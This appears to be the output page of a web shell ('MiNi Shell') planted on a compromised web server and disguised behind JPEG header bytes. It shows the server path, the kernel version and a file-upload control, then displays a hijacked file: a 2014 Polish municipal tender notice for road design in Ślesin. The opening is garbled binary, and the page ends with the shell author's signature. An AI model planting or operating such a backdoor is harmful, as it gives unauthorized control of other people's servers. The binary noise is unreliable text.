JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/76880-N-2014.html

<p class="kh_header"><b>Ślesin: Wykonanie dokumentacji projektowo-kosztorysowej na budowę dróg
w miejscowości Mikorzyn Górka, Kolebki, Honoratka-Rębowo</b><br>
<b>Numer ogłoszenia: 76880 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Ślesin , ul. Kleczewska 15, 62-561 Ślesin, woj. wielkopolskie, tel. 063 2704011, faks 063 2704198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slesin</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej na budowę dróg
w miejscowości Mikorzyn Górka, Kolebki, Honoratka-Rębowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej dla następujących zadań:
a)	Budowa drogi w miejscowości Mikorzyn Górka,
b)	Budowa drogi w miejscowości Kolebki,
c)	Budowa drogi w miejscowości Honoratka - Rębowo.
2) Zakres prac projektowych dla zadania: 

	I. Budowa drogi w miejscowości Mikorzyn Górka

1.	Nawierzchnię drogi należy zaprojektować z betonowej kostki brukowej, koloru szarego.
2.	Nawierzchnię zjazdów należy zaprojektować z betonowej kostki brukowej, koloru czerwonego.
3.	Nawierzchnię chodników należy zaprojektować z betonowej kostki brukowej z podziałem kolorystycznym, szary-czerwony.
4.	Szerokość drogi 5,0 m.
5.	Szerokość chodników 1,5 m.
6.	Szerokość wjazdów na posesje 5 m.
7.	Projekt obejmuje budowę nawierzchni drogi wraz z chodnikami, wjazdami i kanalizacja deszczową w m. Mikorzyn - Górka na dz. nr 84/19. Odcinek o długości 300 mb.
8.	Przedmiotem zamówienia są:
a) opracowanie projektów budowlanego, projektu wykonawczego, projektu organizacji ruchu docelowej, projektu organizacji ruchu na czas robót, przedmiaru robót, kosztorysu inwestorskiego, szczegółowych specyfikacji technicznych oraz dokumentacji w formie elektronicznej PDF oraz edytowalnej,
b) kosztorysy i przedmiary należy sporządzić z podziałem na etapy, które należy uzgodnić z inwestorem,
c) uzgodnienie przebiegu drogi z Inwestorem,
d) wystąpienie o warunki zabudowy,
e) wystąpienie o warunki na włączenie do DK25,
f) opracowanie map sytuacyjno - wysokościowych do celów projektowych,
g) mapy ewidencyjne wraz z wypisami z rejestru gruntów,
h) wykonanie inwentaryzacji zieleni w przypadku konieczności wycięcia drzew uzyskanie pozwolenia na wycinkę,
i) wykonanie badań geotechnicznych podłoża gruntowego,
j) uzyskanie warunków dotyczących niezbędnej przebudowy urządzeń obcych (drogi, urządzenia infrastruktury) kolidujących z projektowaną drogą, chodnikiem, wjazdami oraz opracowanie projektów branżowych ich przebudowy,
k) rozwiązanie odwodnienia nawierzchni drogi, chodników i wjazdów, opracowanie projektu branży sanitarnej wraz ze wszystkimi koniecznymi uzgodnieniami i opiniami, 
l) uzyskanie opinii ZUD,
ł) uzyskanie zgody i uzgodnienie włączenia do DK 25,
m) uzyskanie uzgodnienia z Gminą Ślesin,
n) uzyskanie wszelkich uzgodnień, opinii niezbędnych do uzyskania pozwolenia na budowę, wynikających z obowiązujących przepisów,
o) uzyskanie pozwolenia wodno - prawnego, jeżeli wyniknie taka potrzeba,
p) wystąpienie z wnioskiem o pozwolenie na budowę,
r) uzyskanie pozwolenia na budowę,
s) opracowanie harmonogramu przebiegu wykonania dokumentacji w terminie 14 dni od podpisania umowy, który będzie stanowił integralną część umowy, na podstawie w/w harmonogramu Wykonawca będzie comiesięcznie przekazywał Zamawiającemu sprawozdania z realizacji zamówienia do 5-ego dnia, każdego miesiąca. 
9.	Termin realizacji zamówienia: 29.08.2014 rok
	II. Budowa drogi w miejscowości Kolebki

1.	Nawierzchnię drogi należy zaprojektować z betonu asfaltowego dla ruchu KR2.
2.	Nawierzchnię zjazdów należy zaprojektować z betonu asfaltowego.
3.	Szerokość drogi 4,0 m.
4.	Szerokość wjazdów na posesje  5,0 m.
5.	Projekt obejmuje budowę nawierzchni drogi gminnej w m. Kolebki o dł. ok. 200 mb.
6.	Przedmiotem zamówienia są:
a) opracowanie projektów budowlanego, projektu wykonawczego, projektu organizacji ruchu docelowej, projektu organizacji ruchu na czas robót, przedmiaru robót, kosztorysu inwestorskiego, szczegółowych specyfikacji technicznych oraz dokumentacji w formie elektronicznej PDF oraz edytowalnej,
b) opracowanie map sytuacyjno - wysokościowych do celów projektowych,
c) mapy ewidencyjne wraz z wypisami z rejestru gruntów,
d) wykonanie inwentaryzacji zieleni w przypadku konieczności wycięcia drzew uzyskanie pozwolenia na wycinkę,
e) uzyskanie warunków dotyczących niezbędnej przebudowy urządzeń obcych (drogi, urządzenia infrastruktury) kolidujących z projektowaną drogą, chodnikiem, wjazdami oraz opracowanie projektów branżowych ich przebudowy,
f) rozwiązanie odwodnienia nawierzchni drogi,
g) uzyskanie uzgodnienia z Gminą Ślesin,
h) uzyskanie wszelkich uzgodnień, opinii niezbędnych do uzyskania pozwolenia na budowę, wynikających z obowiązujących przepisów,
i) uzyskanie pozwolenia wodno - prawnego, jeżeli wyniknie taka potrzeba,
j) inwestycja będzie przeprowadzona zgodnie z ustawą o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg z dnia 10 kwietnia, w związku z tym należy uzyskać wszelkie opinie i uzgodnienia wynikające z w/w ustawy,
k) projekty podziału nieruchomości wykonane przez geodetę uprawnionego,  
l) przygotowanie wniosku ZRID oraz uzupełnianie wszelkich poprawek, jeżeli wyniknie taka potrzeba.
7.	Termin realizacji zamówienia: 30.07.2014 rok

	III. Budowa drogi w miejscowości Honoratka - Rębowo

1.	Nawierzchnię drogi należy zaprojektować z betonu asfaltowego dla ruchu KR2.
2.	Nawierzchnię zjazdów należy zaprojektować z betonu asfaltowego.
3.	Szerokość drogi 4,0 m.
4.	Szerokość wjazdów na posesje 5,0 m.
5.	Projekt obejmuje budowę nawierzchni drogi gminnej Honoratka - Rębowo o długości ok. 990 mb.
6.	Przedmiotem zamówienia są:
a) opracowanie projektów budowlanego, projektu wykonawczego, projektu organizacji ruchu docelowej, projektu organizacji ruchu na czas robót, przedmiaru robót, kosztorysu inwestorskiego, szczegółowych specyfikacji technicznych oraz dokumentacji w formie elektronicznej PDF oraz edytowalnej,
b) opracowanie map sytuacyjno - wysokościowych do celów projektowych,
c) mapy ewidencyjne wraz z wypisami z rejestru gruntów,
d) wykonanie inwentaryzacji zieleni w przypadku konieczności wycięcia drzew uzyskanie pozwolenia na wycinkę,
e) uzyskanie warunków dotyczących niezbędnej przebudowy urządzeń obcych (drogi, urządzenia infrastruktury) kolidujących z projektowaną drogą, chodnikiem, wjazdami oraz opracowanie projektów branżowych ich przebudowy,
f) rozwiązanie odwodnienia nawierzchni drogi,
g) uzyskanie uzgodnienia z Gminą Ślesin,
h) uzyskanie wszelkich uzgodnień, opinii niezbędnych do uzyskania pozwolenia na budowę, wynikających z obowiązujących przepisów,
i) uzyskanie pozwolenia wodno - prawnego, jeżeli wyniknie taka potrzeba,
j) inwestycja będzie przeprowadzona zgodnie z ustawą o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg z dnia 10 kwietnia, w związku z tym należy uzyskać wszelkie opinie i uzgodnienia wynikające z w/w ustawy,
k) projekty podziału nieruchomości wykonane przez geodetę uprawnionego,  
l) przygotowanie wniosku ZRID oraz uzupełnianie wszelkich poprawek, jeżeli wyniknie taka potrzeba.
7.	Termin realizacji zamówienia: 30.07.2014 rok
3)   Każde opracowanie powinno obejmować: 
a) projekt budowlany (obejmujący wszystkie niezbędne branże) - szt. 5,
b) projekt wykonawczy - szt. 5 dla każdej z branż,
c) projekt docelowej organizacji ruchu - szt. 5,
d) projekt organizacji ruchu na czas robót - szt. 5,
e) przedmiar robót (podział na etapy do uzgodnienia z Inwestorem) - szt. 3,
f) kosztorys inwestorski (podział na etapy do uzgodnienia z Inwestorem) - szt. 2,
g) specyfikacje techniczne wykonania i odbioru robót - szt. 1,
h) płyta - projekt w formacie PDF - szt. 1,
i) płyta - projekt w wersji edytowalnej (rysunki DWG, opisy DOC, ślepy kosztorys w formacie kst, ath oraz EXEL, itp.) - szt. 1.
4)  Podane długości odcinków dróg są długościami orientacyjnymi i mogą ulec zmianie.
Ponadto do obowiązków Wykonawcy należy opracowanie dokumentacji w sposób zgodny z obowiązującymi przepisami prawa i normami wprowadzającymi normy europejskie lub europejskie aprobaty techniczne.
Projekty nie mogą zawierać znaków towarowych wyrobów budowlanych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfikacją przedmiotu zamówienia, wraz z dodaniem wyrazów /lub równoważny/ zgodnie z art.29 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.).

Uwaga:
1. Wykonawca zobowiązany jest do:
a)  sporządzenia opracowania w sposób określony w art. 29-31 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013r. poz. 907 ze zm.);
b) opracowania zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 ze zm.), stanowiącą podstawę do zgłoszenia właściwemu organowi wykonania robót budowlanych wraz z wszelkimi wymaganymi uzgodnieniami i ekspertyzami, uwzględniającą: 
a) przedmiary robót obejmujące przedmiot zamówienia i uwzględniające wszystkie niezbędne czynności wynikające z konieczności zabezpieczenia prac oraz innych czynności nie wynikających bezpośrednio z dokumentacji technicznej w wyżej wymienionym zakresie; 
2) opracowania specyfikacji technicznej ogólnej i szczegółowej wykonania i odbioru robót budowlanych objętych przedmiotem zamówienia, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 ze zm.), uwzględniającej nazwy i kody: grup, klas oraz kategorii robót określonych w rozporządzeniu (WE) nr 213/2008 z dnia 28 listopada 2007 r. w sprawie Wspólnego Słownika Zamówień; 
3) sporządzenia kosztorysów inwestorskich, na podstawie wykonanych przedmiarów, spełniające wymogi zawarte w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz.1389). 
     
Wizja lokalna .
Zaleca się, aby wykonawca dokonał wizji lokalnej na terenie gdzie mają być wykonane prace oraz uzyskał na swoją odpowiedzialność i ryzyko wszelkie istotne informacje niezbędne do przygotowania oferty. Wizja lokalna winna być dokonana na koszt własny wykonawcy.

2. Warunki płatności:
	             1) faktura częściowa po wykonaniu zadania nr  2 i 3
                          2) faktura końcowa po wykonaniu zadania nr 1..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania obowiązany jest przed upływem terminu składania ofert, do wniesienia wadium w wysokości 1000,00 złotych (słownie: jeden tysiąc złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w zakresie powyższego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia-załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w zakresie powyższego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia-załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w zakresie powyższego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia-załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje, co najmniej jedną osobą, która będzie pełnić obowiązki projektowania w specjalności drogowej.
Zamawiający wymaga, aby Wykonawca dysponował ww. potencjałem kadrowym przez cały okres  realizacji przedmiotu zamówienia.
W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. -Prawo budowlane (Dz.U. z 2013, poz. 1409), z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. nr 63, poz. 394 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych wymagań w zakresie powyższego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia-załącznik nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz Oferty - załącznik nr 1; 2)Oświadczenie o spełnienie warunków na podstawie art. 22 ust. 1 - załącznik nr 2; 3) Informacja o części zamówienia jaka zostanie powierzona podwykonawcy - załącznik nr 6; 4) Informacja o wykonawcach wspólnie ubiegających się o udzielenie zamówienia-/jeżeli dotyczy/ - załącznik nr 7; 5) Pełnomocnictwo (jeżeli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy -polegających na:
1)	zmianie wynagrodzenia Wykonawcy określonego w § 3 umowy w przypadku  ustawowej zmiany stawki podatku VAT;
2)	zmian kluczowego personelu Wykonawcy, za uprzednią zgodą Zamawiającego wyrażoną na pismie akceptującą kandydata na kluczowe stanowisko  w sytuacji,gdy dotychczasowy kluczowy personel  z przyczyn losowych nie może dalej wykonywać powierzonych mu czynności. W przypadku zmiany kluczowego personelu - nowy kandydat musi spełniać wymagania określone w SIWZ.  
3)	zmianie terminu wykonania zamówienia w przypadku:
a)	przedłużania się procedur administracyjnych niezależnych od Wykonawcy na etapie wydawania opinii, uzgodnień, postanowień  lub decyzji administracyjnych;
b)	konieczności wykonania dodatkowych ekspertyz, opinii, opracowań niezbędnych do uzyskania stosownych decyzji,
c)	siły wyższej ( za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia);
d)	innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
5. Zmiana postanowień zawartej umowy w przypadkach określonych w ust.4 pkt 3 lit. b nie może prowadzić do zwiększenia wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umig.slesin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Ślesinie, przy ul. Kleczewskiej 15, 62-561 Ślesin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy w Ślesinie, przy ul. Kleczewskiej 15 /sekretariat-Ipiętro/, 62-561 Ślesin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarie umowy ramowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com